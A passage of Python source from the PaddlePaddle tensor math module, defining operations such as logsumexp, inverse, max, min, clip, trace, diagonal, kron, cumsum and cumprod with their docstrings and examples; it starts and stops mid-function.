            format(input_shape[1]))
    if x_shape[1] != y_shape[0]:
        raise ValueError(
            "The input Variable x's width must be equal to Variable y's height. But received x's shape = {}, y's shape = {}.".
            format(x_shape, y_shape))
if in_dygraph_mode():
out = _C_ops.addmm(input, x, y, "Alpha", alpha, "Beta", beta)
return out
inputs = {'Input': input, "X": x, "Y": y}
attrs = {'Alpha': alpha, 'Beta': beta}
helper = LayerHelper("addmm", **locals())
check_variable_and_dtype(input, 'Input', ['float32', 'float64'], 'addmm')
check_variable_and_dtype(x, 'X', ['float32', 'float64'], 'addmm')
check_variable_and_dtype(y, 'Y', ['float32', 'float64'], 'addmm')
out = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(
type="addmm", inputs=inputs, attrs=attrs, outputs={"Out": out})
return out
def logsumexp(x, axis=None, keepdim=False, name=None):
r"""
This OP calculates the log of the sum of exponentials of ``x`` along ``axis`` .
.. math::
        logsumexp(x) = \log \sum \exp(x)
Args:
x (Tensor): The input Tensor with data type float32 or float64, which
            should have no more than 4 dimensions.
axis (int|list|tuple, optional): The axis along which to perform
logsumexp calculations. ``axis`` should be int, list(int) or
tuple(int). If ``axis`` is a list/tuple of dimension(s), logsumexp
is calculated along all element(s) of ``axis`` . ``axis`` or
element(s) of ``axis`` should be in range [-D, D), where D is the
dimensions of ``x`` . If ``axis`` or element(s) of ``axis`` is
less than 0, it works the same way as :math:`axis + D` . If
``axis`` is None, logsumexp is calculated along all elements of
``x``. Default is None.
keepdim (bool, optional): Whether to reserve the reduced dimension(s)
            in the output Tensor. If ``keepdim`` is True, the dimensions of
the output Tensor is the same as ``x`` except in the reduced
dimensions(it is of size 1 in this case). Otherwise, the shape of
the output Tensor is squeezed in ``axis`` . Default is False.
name (str, optional): Name for the operation (optional, default is None).
For more information, please refer to :ref:`api_guide_Name`.
Returns:
Tensor, results of logsumexp along ``axis`` of ``x``, with the same data
type as ``x``.
Examples:
.. code-block:: python
import paddle
x = paddle.to_tensor([[-1.5, 0., 2.], [3., 1.2, -2.4]])
out1 = paddle.logsumexp(x) # [3.4691226]
out2 = paddle.logsumexp(x, 1) # [2.15317821, 3.15684602]
"""
if isinstance(axis, int):
axis = [axis]
    reduce_all = (axis is None or len(axis) == 0
                  or len(axis) == len(x.shape))
if axis is None or len(axis) == 0:
axis = [0]
if in_dygraph_mode():
return _C_ops.logsumexp(x, 'axis', axis, 'keepdim', keepdim, 'reduce_all', reduce_all)
check_variable_and_dtype(x, 'x',
['float32', 'float64'],
'logsumexp')
helper = LayerHelper('logsumexp', **locals())
attrs = {'axis': axis, 'keepdim': keepdim, 'reduce_all':reduce_all}
out = helper.create_variable_for_type_inference(x.dtype)
helper.append_op(
type='logsumexp', inputs={'X': x}, outputs={'Out': out}, attrs=attrs)
return out
def inverse(x, name=None):
"""
Takes the inverse of the square matrix. A square matrix is a matrix with
the same number of rows and columns. The input can be a square matrix
(2-D Tensor) or batches of square matrices.
Args:
x (Tensor): The input tensor. The last two
dimensions should be equal. When the number of dimensions is
greater than 2, it is treated as batches of square matrix. The data
type can be float32 and float64.
name (str, optional): The default value is None. Normally there is no need for
user to set this property. For more information,
please refer to :ref:`api_guide_Name`
Returns:
Tensor: A Tensor holds the inverse of x. The shape and data type
is the same as x.
Examples:
.. code-block:: python
import paddle
mat = paddle.to_tensor([[2, 0], [0, 2]], dtype='float32')
inv = paddle.inverse(mat)
print(inv) # [[0.5, 0], [0, 0.5]]
"""
if in_dygraph_mode():
return _C_ops.inverse(x)
def _check_input(x):
check_variable_and_dtype(x, 'x',
['float32', 'float64'], 'inverse')
if len(x.shape) < 2:
raise ValueError(
"The input of inverse is expected to be a Tensor whose number "
"of dimensions is no less than 2. But reviced: %d, "
"x's shape: %s." % (len(x.shape), x.shape))
_check_input(x)
helper = LayerHelper('inverse', **locals())
out = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(
type='inverse', inputs={'Input': [x] }, outputs={'Output': [out]})
return out
def max(x, axis=None, keepdim=False, name=None):
"""
Computes the maximum of tensor elements over the given axis.
Args:
x(Tensor): A tensor, the data type is float32,
float64, int32, int64.
axis(int|list|tuple, optional): The axis along which the maximum is computed.
If :attr:`None`, compute the maximum over all elements of
`x` and return a Tensor with a single element,
            otherwise must be in the range :math:`[-x.ndim, x.ndim)`.
If :math:`axis[i] < 0`, the axis to reduce is :math:`x.ndim + axis[i]`.
        keepdim(bool, optional): Whether to reserve the reduced dimension in the
            output Tensor. The result tensor will have one fewer dimension
            than `x` unless :attr:`keepdim` is True. Default is False.
name(str, optional): The default value is None. Normally there is no need for
user to set this property. For more information, please refer to :ref:`api_guide_Name`
Returns:
        Tensor, results of maximum on the specified axis of input tensor,
        its data type is the same as `x`.
Examples:
.. code-block:: python
import paddle
# data_x is a Tensor with shape [2, 4]
# the axis is a int element
x = paddle.to_tensor([[0.2, 0.3, 0.5, 0.9],
[0.1, 0.2, 0.6, 0.7]])
result1 = paddle.max(x)
print(result1)
#[0.9]
result2 = paddle.max(x, axis=0)
print(result2)
#[0.2 0.3 0.6 0.9]
result3 = paddle.max(x, axis=-1)
print(result3)
#[0.9 0.7]
result4 = paddle.max(x, axis=1, keepdim=True)
print(result4)
#[[0.9]
# [0.7]]
# data_y is a Tensor with shape [2, 2, 2]
# the axis is list
y = paddle.to_tensor([[[1.0, 2.0], [3.0, 4.0]],
[[5.0, 6.0], [7.0, 8.0]]])
result5 = paddle.max(y, axis=[1, 2])
print(result5)
#[4. 8.]
result6 = paddle.max(y, axis=[0, 1])
print(result6)
#[7. 8.]
"""
if axis is not None and not isinstance(axis, list):
if isinstance(axis, tuple):
axis = list(axis)
elif isinstance(axis, int):
            axis = [axis]
        else:
            raise TypeError(
                "The type of axis must be int, list or tuple, but received {}".format(type(axis)))
    reduce_all = axis is None or axis == []
    axis = axis if axis is not None and axis != [] else [0]
if in_dygraph_mode():
return _C_ops.reduce_max(x, 'dim', axis, 'keep_dim', keepdim,
'reduce_all', reduce_all)
helper = LayerHelper('max', **locals())
check_variable_and_dtype(
x, 'x', ['float32', 'float64', 'int32', 'int64'], 'max')
out = helper.create_variable_for_type_inference(
dtype=x.dtype)
helper.append_op(
type='reduce_max',
inputs={'X': x},
outputs={'Out': out},
attrs={
'dim': axis,
'keep_dim': keepdim,
'reduce_all': reduce_all
})
return out
def min(x, axis=None, keepdim=False, name=None):
"""
Computes the minimum of tensor elements over the given axis
Args:
x(Tensor): A tensor, the data type is float32, float64, int32, int64.
axis(int|list|tuple, optional): The axis along which the minimum is computed.
If :attr:`None`, compute the minimum over all elements of
`x` and return a Tensor with a single element,
otherwise must be in the range :math:`[-x.ndim, x.ndim)`.
If :math:`axis[i] < 0`, the axis to reduce is :math:`x.ndim + axis[i]`.
        keepdim(bool, optional): Whether to reserve the reduced dimension in the
            output Tensor. The result tensor will have one fewer dimension
            than `x` unless :attr:`keepdim` is True. Default is False.
name(str, optional): The default value is None. Normally there is no need for
user to set this property. For more information, please refer to :ref:`api_guide_Name`
Returns:
        Tensor, results of minimum on the specified axis of input tensor,
        its data type is the same as the input Tensor.
Examples:
.. code-block:: python
import paddle
# x is a tensor with shape [2, 4]
# the axis is a int element
x = paddle.to_tensor([[0.2, 0.3, 0.5, 0.9],
[0.1, 0.2, 0.6, 0.7]])
result1 = paddle.min(x)
print(result1)
#[0.1]
result2 = paddle.min(x, axis=0)
print(result2)
#[0.1 0.2 0.5 0.7]
result3 = paddle.min(x, axis=-1)
print(result3)
#[0.2 0.1]
result4 = paddle.min(x, axis=1, keepdim=True)
print(result4)
#[[0.2]
# [0.1]]
# y is a Tensor with shape [2, 2, 2]
# the axis is list
y = paddle.to_tensor([[[1.0, 2.0], [3.0, 4.0]],
[[5.0, 6.0], [7.0, 8.0]]])
result5 = paddle.min(y, axis=[1, 2])
print(result5)
#[1. 5.]
result6 = paddle.min(y, axis=[0, 1])
print(result6)
#[1. 2.]
"""
if axis is not None and not isinstance(axis, list):
if isinstance(axis, tuple):
axis = list(axis)
elif isinstance(axis, int):
            axis = [axis]
        else:
            raise TypeError(
                "The type of axis must be int, list or tuple, but received {}".format(type(axis)))
    reduce_all = axis is None or axis == []
    axis = axis if axis is not None and axis != [] else [0]
if in_dygraph_mode():
return _C_ops.reduce_min(x, 'dim', axis, 'keep_dim', keepdim,
'reduce_all', reduce_all)
helper = LayerHelper('min', **locals())
check_variable_and_dtype(
x, 'x', ['float32', 'float64', 'int32', 'int64'], 'min')
out = helper.create_variable_for_type_inference(
dtype=x.dtype)
helper.append_op(
type='reduce_min',
inputs={'X': x},
outputs={'Out': out},
attrs={
'dim': axis,
'keep_dim': keepdim,
'reduce_all': reduce_all
})
return out
def log1p(x, name=None):
r"""
Calculates the natural log of the given input tensor, element-wise.
.. math::
        Out = \ln(x+1)
Args:
x (Tensor): Input Tensor. Must be one of the following types: float32, float64.
name(str, optional): The default value is None. Normally there is no need for
user to set this property. For more information, please refer to :ref:`api_guide_Name`
Returns:
Tensor, the natural log of the input Tensor computed element-wise.
Examples:
.. code-block:: python
import paddle
data = paddle.to_tensor([[0], [1]], dtype='float32')
res = paddle.log1p(data)
# [[0.], [0.6931472]]
"""
if in_dygraph_mode():
return _C_ops.log1p(x)
check_variable_and_dtype(x, 'x', ['float32', 'float64'], "log1p")
inputs = {'X': [x]}
helper = LayerHelper('log1p', **locals())
dtype = helper.input_dtype(input_param_name='x')
out = helper.create_variable_for_type_inference(dtype)
helper.append_op(type="log1p", inputs={"X": x}, outputs={"Out": out})
return out
def log2(x, name=None):
r"""
Calculates the log to the base 2 of the given input tensor, element-wise.
.. math::
        Out = \log_2 x
Args:
x (Tensor): Input tensor must be one of the following types: float32, float64.
name (str|None): The default value is None. Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name`
Returns:
Tensor: The log to the base 2 of the input Tensor computed element-wise.
Examples:
.. code-block:: python
import paddle
            # example 1: x is a float32 Tensor
            x_i = paddle.to_tensor([[1.0], [2.0]])
            res = paddle.log2(x_i) # [[0.], [1.0]]
            # example 2: x is float32
            x_i = paddle.full(shape=[1], fill_value=2, dtype='float32')
            res = paddle.log2(x_i)
            print(res) # [1.0]
            # example 3: x is float64
            x_i = paddle.full(shape=[1], fill_value=2, dtype='float64')
            res = paddle.log2(x_i)
            print(res) # [1.0]
"""
if in_dygraph_mode():
return _C_ops.log2(x)
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'], "log2")
inputs = {'X': [x]}
helper = LayerHelper('log2', **locals())
dtype = helper.input_dtype(input_param_name='x')
out = helper.create_variable_for_type_inference(dtype)
helper.append_op(type="log2", inputs={"X": x}, outputs={"Out": out})
return out
def log10(x, name=None):
r"""
Calculates the log to the base 10 of the given input tensor, element-wise.
.. math::
        Out = \log_{10} x
Args:
x (Tensor): Input tensor must be one of the following types: float32, float64.
name (str|None): The default value is None. Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name`
Returns:
Tensor: The log to the base 10 of the input Tensor computed element-wise.
Examples:
.. code-block:: python
import paddle
            # example 1: x is a float32 Tensor
            x_i = paddle.to_tensor([[1.0], [10.0]])
            res = paddle.log10(x_i) # [[0.], [1.0]]
            # example 2: x is float32
            x_i = paddle.full(shape=[1], fill_value=10, dtype='float32')
            res = paddle.log10(x_i)
            print(res) # [1.0]
            # example 3: x is float64
            x_i = paddle.full(shape=[1], fill_value=10, dtype='float64')
            res = paddle.log10(x_i)
            print(res) # [1.0]
"""
if in_dygraph_mode():
return _C_ops.log10(x)
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'], "log10")
inputs = {'X': [x]}
helper = LayerHelper('log10', **locals())
dtype = helper.input_dtype(input_param_name='x')
out = helper.create_variable_for_type_inference(dtype)
helper.append_op(type="log10", inputs={"X": x}, outputs={"Out": out})
return out
def clip(x, min=None, max=None, name=None):
"""
    This operator clips all elements of the input into the range [min, max] and returns
    a resulting tensor as the following equation:
.. math::
Out = MIN(MAX(x, min), max)
Args:
x (Tensor): An N-D Tensor with data type float32, float64, int32 or int64.
        min (float|int|Tensor, optional): The lower bound with type ``float``, ``int`` or a ``Tensor``
            with shape [1] and type ``int32``, ``float32``, ``float64``. Default is None.
        max (float|int|Tensor, optional): The upper bound with type ``float``, ``int`` or a ``Tensor``
            with shape [1] and type ``int32``, ``float32``, ``float64``. Default is None.
name (str, optional): The default value is None. Normally there is no
need for user to set this property. For more information, please
refer to :ref:`api_guide_Name`.
Returns:
Tensor: A Tensor with the same data type and data shape as input.
Examples:
.. code-block:: python
import paddle
x1 = paddle.to_tensor([[1.2, 3.5], [4.5, 6.4]], 'float32')
out1 = paddle.clip(x1, min=3.5, max=5.0)
out2 = paddle.clip(x1, min=2.5)
print(out1)
            # [[3.5, 3.5],
            #  [4.5, 5.0]]
            print(out2)
            # [[2.5, 3.5],
            #  [4.5, 6.4]]
"""
x_dtype = str(x.dtype)
if x_dtype == 'paddle.int32':
min_ = np.iinfo(np.int32).min
max_ = np.iinfo(np.int32).max - 2**7
elif x_dtype == 'paddle.int64':
min_ = np.iinfo(np.int64).min
max_ = np.iinfo(np.int64).max - 2**39
else:
min_ = float(np.finfo(np.float32).min)
max_ = float(np.finfo(np.float32).max)
if in_dygraph_mode():
if isinstance(min, Variable):
min = min.numpy().item(0)
if isinstance(max, Variable):
max = max.numpy().item(0)
min = min_ if min is None else min
max = max_ if max is None else max
return _C_ops.clip(x, "min", min, "max", max)
if min is not None:
check_type(min, 'min', (float, int, Variable), 'clip')
if isinstance(min, Variable):
check_dtype(min.dtype, 'min', ['float32', 'float64', 'int32'],
'clip', '(When the type of min in clip is Variable.)')
if max is not None:
check_type(max, 'max', (float, int, Variable), 'clip')
if isinstance(max, Variable):
check_dtype(max.dtype, 'max', ['float32', 'float64', 'int32'],
'clip', '(When the type of max in clip is Variable.)')
check_variable_and_dtype(x, 'x', ['float32', 'float64', 'int32', 'int64'], 'clip')
inputs = {'X': x}
attrs = {'min': min_, 'max': max_}
if isinstance(min, Variable):
min.stop_gradient = True
inputs['Min'] = min
elif min is not None:
attrs['min'] = min
if isinstance(max, Variable):
max.stop_gradient = True
inputs['Max'] = max
elif max is not None:
attrs['max'] = max
helper = LayerHelper('clip', **locals())
output = helper.create_variable_for_type_inference(
dtype=helper.input_dtype('x'))
helper.append_op(
type='clip', inputs=inputs, outputs={'Out': [output]}, attrs=attrs)
return output
@inplace_apis_in_dygraph_only
def clip_(x, min=None, max=None, name=None):
"""
Inplace version of ``clip`` API, the output Tensor will be inplaced with input ``x``.
Please refer to :ref:`api_tensor_clip`.
"""
fmin = float(np.finfo(np.float32).min)
fmax = float(np.finfo(np.float32).max)
if isinstance(min, Variable):
min = min.numpy().item(0)
if isinstance(max, Variable):
max = max.numpy().item(0)
min = fmin if min is None else min
max = fmax if max is None else max
return _C_ops.clip_(x, "min", min, "max", max)
def trace(x, offset=0, axis1=0, axis2=1, name=None):
"""
**trace**
This OP computes the sum along diagonals of the input tensor x.
    If ``x`` is 2D, returns the sum of the diagonal.
    If ``x`` has larger dimensions, returns a tensor of diagonal sums, where the diagonals are taken from
    the 2D planes specified by axis1 and axis2. By default, the 2D planes are formed by the first and second axes
    of the input tensor x.
The argument ``offset`` determines where diagonals are taken from input tensor x:
- If offset = 0, it is the main diagonal.
- If offset > 0, it is above the main diagonal.
- If offset < 0, it is below the main diagonal.
- Note that if offset is out of input's shape indicated by axis1 and axis2, 0 will be returned.
Args:
x(Tensor): The input tensor x. Must be at least 2-dimensional. The input data type should be float32, float64, int32, int64.
offset(int, optional): Which diagonals in input tensor x will be taken. Default: 0 (main diagonals).
axis1(int, optional): The first axis with respect to take diagonal. Default: 0.
axis2(int, optional): The second axis with respect to take diagonal. Default: 1.
name (str, optional): Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name`. Default: None.
Returns:
Tensor: the output data type is the same as input data type.
Examples:
.. code-block:: python
import paddle
case1 = paddle.randn([2, 3])
case2 = paddle.randn([3, 10, 10])
case3 = paddle.randn([3, 10, 5, 10])
data1 = paddle.trace(case1) # data1.shape = [1]
data2 = paddle.trace(case2, offset=1, axis1=1, axis2=2) # data2.shape = [3]
            data3 = paddle.trace(case3, offset=-3, axis1=1, axis2=-1) # data3.shape = [3, 5]
"""
    def __check_input(x, offset, axis1, axis2):
check_dtype(x.dtype, 'Input',
['int32', 'int64', 'float16', 'float32', 'float64'],
'trace')
input_shape = list(x.shape)
assert len(input_shape) >= 2, \
"The x must be at least 2-dimensional, " \
"But received Input x's dimensional: %s.\n" % \
len(input_shape)
axis1_ = axis1 if axis1 >= 0 else len(input_shape) + axis1
axis2_ = axis2 if axis2 >= 0 else len(input_shape) + axis2
assert ((0 <= axis1_) and (axis1_ < len(input_shape))), \
"The argument axis1 is out of range (expected to be in range of [%d, %d], but got %d).\n" \
% (-(len(input_shape)), len(input_shape) - 1, axis1)
assert ((0 <= axis2_) and (axis2_ < len(input_shape))), \
"The argument axis2 is out of range (expected to be in range of [%d, %d], but got %d).\n" \
% (-(len(input_shape)), len(input_shape) - 1, axis2)
assert axis1_ != axis2_, \
"axis1 and axis2 cannot be the same axis." \
"But received axis1 = %d, axis2 = %d\n"%(axis1, axis2)
    __check_input(x, offset, axis1, axis2)
if in_dygraph_mode():
return _C_ops.trace(x, 'offset', offset, 'axis1', axis1, 'axis2', axis2)
inputs = {'Input': [x]}
attrs = {'offset': offset, 'axis1': axis1, 'axis2': axis2}
helper = LayerHelper('trace', **locals())
out = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(
type='trace',
inputs={'Input': [x]},
attrs={'offset': offset,
'axis1': axis1,
'axis2': axis2},
outputs={'Out': [out]})
return out
def diagonal(x, offset=0, axis1=0, axis2=1, name=None):
"""
This OP computes the diagonals of the input tensor x.
If ``x`` is 2D, returns the diagonal.
    If ``x`` has larger dimensions, the diagonals are taken from the 2D planes specified by axis1 and axis2.
    By default, the 2D planes are formed by the first and second axes of the input tensor x.
The argument ``offset`` determines where diagonals are taken from input tensor x:
- If offset = 0, it is the main diagonal.
- If offset > 0, it is above the main diagonal.
- If offset < 0, it is below the main diagonal.
Args:
x(Tensor): The input tensor x. Must be at least 2-dimensional. The input data type should be bool, int32, int64, float16, float32, float64.
offset(int, optional): Which diagonals in input tensor x will be taken. Default: 0 (main diagonals).
axis1(int, optional): The first axis with respect to take diagonal. Default: 0.
axis2(int, optional): The second axis with respect to take diagonal. Default: 1.
name (str, optional): Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name`. Default: None.
Returns:
        Tensor: a partial view of the input tensor along the two specified dimensions; the output data type is the same as the input data type.
Examples:
.. code-block:: python
import paddle
x = paddle.rand([2,2,3],'float32')
print(x)
# Tensor(shape=[2, 2, 3], dtype=float32, place=CUDAPlace(0), stop_gradient=True,
# [[[0.45661032, 0.03751532, 0.90191704],
# [0.43760979, 0.86177313, 0.65221709]],
# [[0.17020577, 0.00259554, 0.28954273],
# [0.51795638, 0.27325270, 0.18117726]]])
out1 = paddle.diagonal(x)
print(out1)
#Tensor(shape=[3, 2], dtype=float32, place=CUDAPlace(0), stop_gradient=True,
# [[0.45661032, 0.51795638],
# [0.03751532, 0.27325270],
# [0.90191704, 0.18117726]])
out2 = paddle.diagonal(x, offset=0, axis1=2, axis2=1)
print(out2)
#Tensor(shape=[2, 2], dtype=float32, place=CUDAPlace(0), stop_gradient=True,
# [[0.45661032, 0.86177313],
# [0.17020577, 0.27325270]])
out3 = paddle.diagonal(x, offset=1, axis1=0, axis2=1)
print(out3)
#Tensor(shape=[3, 1], dtype=float32, place=CUDAPlace(0), stop_gradient=True,
# [[0.43760979],
# [0.86177313],
# [0.65221709]])
out4 = paddle.diagonal(x, offset=0, axis1=1, axis2=2)
print(out4)
#Tensor(shape=[2, 2], dtype=float32, place=CUDAPlace(0), stop_gradient=True,
# [[0.45661032, 0.86177313],
# [0.17020577, 0.27325270]])
"""
if in_dygraph_mode():
return _C_ops.diagonal(x, 'offset', offset, 'axis1', axis1, 'axis2', axis2)
    def __check_input(x, offset, axis1, axis2):
check_dtype(x.dtype, 'Input',
['bool', 'int32', 'int64', 'float16', 'float32', 'float64'],
'diagonal')
input_shape = list(x.shape)
assert len(input_shape) >= 2, \
"The x must be at least 2-dimensional, " \
"But received Input x's dimensional: %s.\n" % \
len(input_shape)
axis1_ = axis1 if axis1 >= 0 else len(input_shape) + axis1
axis2_ = axis2 if axis2 >= 0 else len(input_shape) + axis2
assert axis1_ < len(input_shape), \
"The argument axis1 is out of range (expected to be in range of [%d, %d], but got %d).\n" \
% (-(len(input_shape)), len(input_shape) - 1, axis1)
assert axis2_ < len(input_shape), \
"The argument axis2 is out of range (expected to be in range of [%d, %d], but got %d).\n" \
% (-(len(input_shape)), len(input_shape) - 1, axis2)
assert axis1_ != axis2_, \
"axis1 and axis2 cannot be the same axis." \
"But received axis1 = %d, axis2 = %d\n"%(axis1, axis2)
    __check_input(x, offset, axis1, axis2)
helper = LayerHelper('diagonal', **locals())
out = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(
type='diagonal',
inputs={'Input': [x]},
attrs={'offset': offset,
'axis1': axis1,
'axis2': axis2},
outputs={'Out': [out]})
return out
@templatedoc(op_type="kron")
def kron(x, y, name=None):
"""
${comment}
Args:
        x (Tensor): the first operand of kron op, data type: float16, float32,
            float64, int32 or int64.
        y (Tensor): the second operand of kron op, data type: float16,
            float32, float64, int32 or int64. Its data type should be the same
            as x.
name(str, optional): The default value is None. Normally there is no
need for user to set this property. For more information, please
refer to :ref:`api_guide_Name`.
Returns:
        Tensor: The output of kron op, data type: float16, float32, float64, int32 or int64. Its data type is the same as x.
Examples:
.. code-block:: python
import paddle
x = paddle.to_tensor([[1, 2], [3, 4]], dtype='int64')
y = paddle.to_tensor([[1, 2, 3], [4, 5, 6], [7, 8, 9]], dtype='int64')
out = paddle.kron(x, y)
print(out)
            # [[ 1,  2,  3,  2,  4,  6],
            #  [ 4,  5,  6,  8, 10, 12],
            #  [ 7,  8,  9, 14, 16, 18],
            #  [ 3,  6,  9,  4,  8, 12],
            #  [12, 15, 18, 16, 20, 24],
            #  [21, 24, 27, 28, 32, 36]]
"""
if in_dygraph_mode():
return _C_ops.kron(x, y)
helper = LayerHelper('kron', **locals())
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64', 'int32', 'int64'], 'kron')
check_variable_and_dtype(y, 'y', ['float16', 'float32', 'float64', 'int32', 'int64'], 'kron')
out = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(type="kron", inputs={"X": x, "Y": y}, outputs={"Out": out})
return out
def cumsum(x, axis=None, dtype=None, name=None):
"""
The cumulative sum of the elements along a given axis.
**Note**:
        The first element of the result is the same as the first element of the input.
Args:
x (Tensor): The input tensor needed to be cumsumed.
axis (int, optional): The dimension to accumulate along. -1 means the last dimension. The default (None) is to compute the cumsum over the flattened array.
        dtype (str, optional): The data type of the output tensor, can be float32, float64, int32, int64. If specified, the input tensor is cast to dtype before the operation is performed. This is useful for preventing data type overflows. The default value is None.
name (str, optional): Name for the operation (optional, default is None). For more information, please refer to :ref:`api_guide_Name`.
Returns:
Tensor, the result of cumsum operator.
Examples:
.. code-block:: python
import paddle
data = paddle.arange(12)
data = paddle.reshape(data, (3, 4))
y = paddle.cumsum(data)
# [ 0 1 3 6 10 15 21 28 36 45 55 66]
y = paddle.cumsum(data, axis=0)
# [[ 0 1 2 3]
# [ 4 6 8 10]
# [12 15 18 21]]
y = paddle.cumsum(data, axis=-1)
# [[ 0 1 3 6]
# [ 4 9 15 22]
# [ 8 17 27 38]]
y = paddle.cumsum(data, dtype='float64')
print(y.dtype)
# VarType.FP64
"""
if axis is None:
flatten = True
else:
flatten = False
if dtype is not None and x.dtype != convert_np_dtype_to_dtype_(dtype):
x = layers.cast(x, dtype)
if in_dygraph_mode():
if axis is None:
return _C_ops.cumsum(x, 'flatten', flatten)
else:
return _C_ops.cumsum(x, 'axis', axis, 'flatten', flatten)
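    # Static-graph fallback: route through the auto-generated `cumsum` layer,
    # forwarding only the non-None arguments.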
    check_type(x, 'x', Variable, 'cumsum')
locals_var = locals().copy()
kwargs = dict()
for name, val in locals_var.items():
if val is not None:
kwargs[name] = val
_cum_sum_ = generate_layer_fn('cumsum')
return _cum_sum_(**kwargs)
def cumprod(x, dim=None, dtype=None, name=None):
"""
Compute the cumulative product of the input tensor x along a given dimension dim.
**Note**:
The first element of the result is the same as the first element of the input.
Args:
        x (Tensor): the input tensor whose cumulative product is to be computed.
        dim (int): the dimension along which the input tensor will be accumulated. It needs to be in the range of [-x.rank, x.rank), where x.rank means the dimensions of the input tensor x and -1 means the last dimension.
        dtype (str, optional): The data type of the output tensor, can be float32, float64, int32, int64, complex64, complex128. If specified, the input tensor is cast to dtype before the operation is performed. This is useful for preventing data type overflows. The default value is None.
name (str, optional): Name for the operation (optional, default is None). For more information, please refer to :ref:`api_guide_Name`.
Returns:
Tensor, the result of cumprod operator.
Examples:
.. code-block:: python
import paddle
data = paddle.arange(12)
data = paddle.reshape(data, (3, 4))
# [[ 0 1 2 3 ]
# [ 4 5 6 7 ]
# [ 8 9 10 11]]
y = paddle.cumprod(data, dim=0)
# [[ 0 1 2 3]
# [ 0 5 12 21]
# [ 0 45 120 231]]
y = paddle.cumprod(data, dim=-1)
# [[ 0 0 0 0]
# [ 4 20 120 840]
# [ 8 72 720 7920]]
y = paddle.cumprod(data, dim=1, dtype='float64')
# [[ 0. 0. 0. 0.]
# [ 4. 20. 120. 840.]
# [ 8. 72. 720. 7920.]]
print(y.dtype)
# paddle.float64
"""
if dtype is not None and x.dtype != convert_np_dtype_to_dtype_(dtype):
x = layers.cast(x, dtype)
if in_dygraph_mode():
return _C_ops.cumprod(x, 'dim', dim)
check_variable_and_dtype(x, "x", ['complex64', 'complex128', 'float32', 'float64', 'int32', 'int64'], 'cumprod')
check_type(dim, 'dim', int, 'cumprod')
helper = LayerHelper('cumprod', **locals())
out = helper.create_variable_for_type_inference(x.dtype)
helper.append_op(type='cumprod', inputs={'X': x}, outputs={'Out': out}, attrs={'dim': dim})
return out
def isfinite(x, name=None):
"""
    Return whether every element of the input tensor is a finite number or not.
Args:
x (Tensor): The input tensor, it's data type should be float16, float32, float64, int32, int64.
name (str, optional): Name for the operation (optional, default is None). For more information, please refer to :ref:`api_guide_Name`.
Returns:
        `Tensor`, the bool result showing whether each element of `x` is a finite number.
Examples:
.. code-block:: python
import paddle
x = paddle.to_tensor([float('-inf'), -2, 3.6, float('inf'), 0, float('-nan'), float('nan')])
out = paddle.tensor.isfinite(x)
print(out) # [False True True False True False False]
"""
if in_dygraph_mode():
return _C_ops.isfinite_v2(x)
helper = LayerHelper("isfinite_v2", **locals())
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64', 'int32', 'int64'], 'isfinite')
out = helper.create_variable_for_type_inference('bool')
helper.append_op(type="isfinite_v2", inputs={"X": x}, outputs={"Out": out})
return out
def isinf(x, name=None):
"""
    Return whether every element of the input tensor is `+/-INF` or not.
Args:
x (Tensor): The input tensor, it's data type should be float16, float32, float64, int32, int64.
name (str, optional): Name for the operation (optional, default is None). For more information, please refer to :ref:`api_guide_Name`.
Returns:
        `Tensor`, the bool result showing whether each element of `x` is `+/-INF`.
Examples:
.. code-block:: python
import paddle
x = paddle.to_tensor([float('-inf'), -2, 3.6, float('inf'), 0, float('-nan'), float('nan')])
out = paddle.tensor.isinf(x)
print(out) # [ True False False True False False False]
"""
if in_dygraph_mode():
return _C_ops.isinf_v2(x)
helper = LayerHelper("isinf_v2", **locals())
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64', 'int32', 'int64'], 'isinf')
out = helper.create_variable_for_type_inference(dtype='bool')
helper.append_op(type="isinf_v2", inputs={"X": x}, outputs={"Out": out})
return out
def isnan(x, name=None):
"""
    Return whether every element of the input tensor is `NaN` or not.
Args:
x (Tensor): The input tensor, it's data type should be float16, float32, float64, int32, int64.
name (str, optional): Name for the operation (optional, default is None). For more information, please refer to :ref:`api_guide_Name`.
Returns:
        `Tensor`, the bool result showing whether each element of `x` is `NaN`.
Examples:
.. code-block:: python
import paddle
x = paddle.to_tensor([float('-inf'), -2, 3.6, float('inf'), 0, float('-nan'), float('nan')])
out = paddle.tensor.isnan(x)
print(out) # [False False False False False True True]
"""
if in_dygraph_mode():
return _C_ops.isnan_v2(x)
helper = LayerHelper("isnan_v2", **locals())
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64', 'int32', 'int64'], 'isnan')
out = helper.create_variable_for_type_inference(dtype='bool')
helper.append_op(type="isnan_v2", inputs={"X": x}, outputs={"Out": out})
return out
def prod(x, axis=None, keepdim=False, dtype=None, name=None):
"""
Compute the product of tensor elements over the given axis.
Args:
x(Tensor): The input tensor, its data type should be float32, float64, int32, int64.
axis(int|list|tuple, optional): The axis along which the product is computed. If :attr:`None`,
multiply all elements of `x` and return a Tensor with a single element,
otherwise must be in the range :math:`[-x.ndim, x.ndim)`. If :math:`axis[i]<0`,
the axis to reduce is :math:`x.ndim + axis[i]`. Default is None.
        dtype(str|np.dtype, optional): The desired data type of the returned tensor, can be float32, float64,
            int32, int64. If specified, the input tensor is cast to dtype before the operation is performed.
            This is very useful for avoiding data type overflows. The default value is None, the dtype
of output is the same as input Tensor `x`.
keepdim(bool, optional): Whether to reserve the reduced dimension in the output Tensor. The result
tensor will have one fewer dimension than the input unless `keepdim` is true. Default is False.
name(string, optional): The default value is None. Normally there is no need for user to set this property.
For more information, please refer to :ref:`api_guide_Name` .
Returns:
Tensor, result of product on the specified dim of input tensor.
Raises:
ValueError: The :attr:`dtype` must be float32, float64, int32 or int64.
TypeError: The type of :attr:`axis` must be int, list or tuple.
Examples:
.. code-block:: python
import paddle
